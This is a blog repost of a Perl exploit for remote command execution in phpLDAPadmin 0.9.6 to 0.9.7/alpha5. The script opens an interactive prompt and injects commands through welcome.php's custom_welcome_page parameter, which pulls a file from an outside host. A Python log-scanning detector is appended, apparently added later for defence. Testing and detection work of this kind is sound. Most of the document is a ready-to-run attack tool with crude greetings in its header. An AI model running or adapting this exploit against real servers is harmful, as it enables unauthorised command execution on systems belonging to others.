ITPub Blog

phpLDAPadmin Command Execution (Exploit)

Original · IT General · Author: coolwinds · Date: 2005-09-04 13:26:28

Summary
"phpLDAPadmin is a web-based LDAP client. It provides easy, anywhere-accessible, multi-language administration for your LDAP server."

Lack of proper parameter filtering in phpLDAPadmin allows attackers to cause the program to execute arbitrary code. The following exploit code can be used to test your installation for the mentioned vulnerability.

Credit:
The information has been provided by "Johnnie Walker".

Exploit:
#!/usr/bin/perl
# Coded By Johnnie Walker
# Greets: sirh0t , Cute Eliisabeth And Tayphoon
# Suck My Dick: cobradriver , atmaca , kozan
# Red Dragon: Johhnie Walker . Nightmare . Erbil
# f0rtcu We Never f0rget You

use IO::Socket;

# Arguments: host, path to the phpLDAPadmin installation, target number
if ($ARGV[0] && $ARGV[1])
{
    $host = $ARGV[0];
    $path = $ARGV[1];
    $target = $ARGV[2];

    $sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$host", PeerPort => "80") || die "Can't connect!\r\n";
    while (1) {
        print 'RedDrag0n@'.$host.'$ ';
        $cmd = <STDIN>;

        # Target 2: welcome.php is asked to load custom_welcome_page from a remote URL
        if ($target == 2) {
            $file = "welcome.php?custom_welcome_page=http://sinanreklam.net/banner.gif?cmd=";
        }
        chop($cmd);
        last if ($cmd eq 'exit');
        print $sock "GET ".$path.$file.$cmd." HTTP/1.1\r\nHost: ".$host."\r\nConnection: Keep-Alive\r\n\r\n";
        # Print only the part of the response between the _begin_ and _end_ markers
        $vuln=0;
        while ($ans = <$sock>)
        {
            if ($vuln == 1) { print "$ans"; }
            last if ($ans =~ /^_end_/);
            if ($ans =~ /^_begin_/) { $vuln = 1; }
        }
        if ($vuln == 0) {print "Exploit Failed :(\r\n";exit();}
    }
}
else {
    print "phpLDAPadmin 0.9.6 - 0.9.7/alpha5 Remote Command Execution\r\n\r\n";
    print "Coded By Johhnie Walker\r\n\r\n";
    print "Greets To sirh0t , Cute Eliisabeth And Tayphoon\r\n\r\n";
    print "Usage: perl $0 <host> <path> [target_nr] 2\r\n\r\n";
    print "Example: perl $0 victim.com /phpldapadmin/ 2 \r\n\r\n";
    exit;
}
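
A defender-side check for the request this script sends, as an added example that is not part of the original post or of phpLDAPadmin: it scans web-server access logs for welcome.php requests whose custom_welcome_page parameter carries a remote URL. The "combined" log layout, the function names and the sample log lines are assumptions made for the illustration.

```python
import re
from urllib.parse import parse_qsl, unquote

# Assumed Apache/nginx "combined" layout: client ident user [time] "request" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>.*?)" (?P<status>\d{3}) ')
# Absolute (scheme://) or protocol-relative (//host) value, i.e. not a local file.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.-]*:)?//', re.I)

def request_target(req):
    """Return the request target even when it holds raw spaces, as the script's
    unencoded commands produce: drop the method and the trailing HTTP/x.y token."""
    _method, _, rest = req.partition(" ")
    return re.sub(r"\s+HTTP/\d(?:\.\d)?$", "", rest)

def find_remote_welcome_includes(lines):
    """List log entries that pass a remote URL in welcome.php's custom_welcome_page."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the assumed log layout
        path, _, query = request_target(m["req"]).partition("?")
        if not unquote(path).lower().endswith("/welcome.php"):
            continue
        # parse_qsl percent-decodes names and values, so %68ttp%3A%2F%2F... is caught too
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name == "custom_welcome_page" and REMOTE_RE.match(value):
                hits.append({"ip": m["ip"], "time": m["ts"],
                             "status": int(m["status"]), "value": value})
    return hits

# Constructed sample log lines (documentation addresses, placeholder host names).
SAMPLE_LOG = [
    '203.0.113.7 - - [04/Sep/2005:13:20:01 +0000] "GET /phpldapadmin/welcome.php?custom_welcome_page=http://remote.example/banner.gif?cmd=ls -la HTTP/1.1" 200 5120 "-" "-"',
    '203.0.113.9 - - [04/Sep/2005:13:21:40 +0000] "GET /pla/Welcome.php?custom_welcome_page=%68ttp%3A%2F%2Fremote.example%2Fx.gif%3Fcmd%3Did HTTP/1.1" 404 310 "-" "-"',
    '192.0.2.15 - - [04/Sep/2005:13:22:02 +0000] "GET /phpldapadmin/welcome.php HTTP/1.1" 200 2048 "-" "-"',
    '192.0.2.15 - - [04/Sep/2005:13:22:09 +0000] "GET /phpldapadmin/welcome.php?custom_welcome_page=welcome_local.html HTTP/1.1" 200 2101 "-" "-"',
    '192.0.2.44 - - [04/Sep/2005:13:25:30 +0000] "GET /phpldapadmin/login.php?next=http://intranet.example/ HTTP/1.1" 200 900 "-" "-"',
]

if __name__ == "__main__":
    for hit in find_remote_welcome_includes(SAMPLE_LOG):
        print(hit["time"], hit["ip"], hit["status"], hit["value"])
```

A hit with status 200 deserves a closer look than a 404, since the latter means no welcome.php existed at that path.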

From "ITPUB Blog", link: http://blog.itpub.net/83980/viewspace-805806/. If you repost this, please credit the source; otherwise legal liability will be pursued.
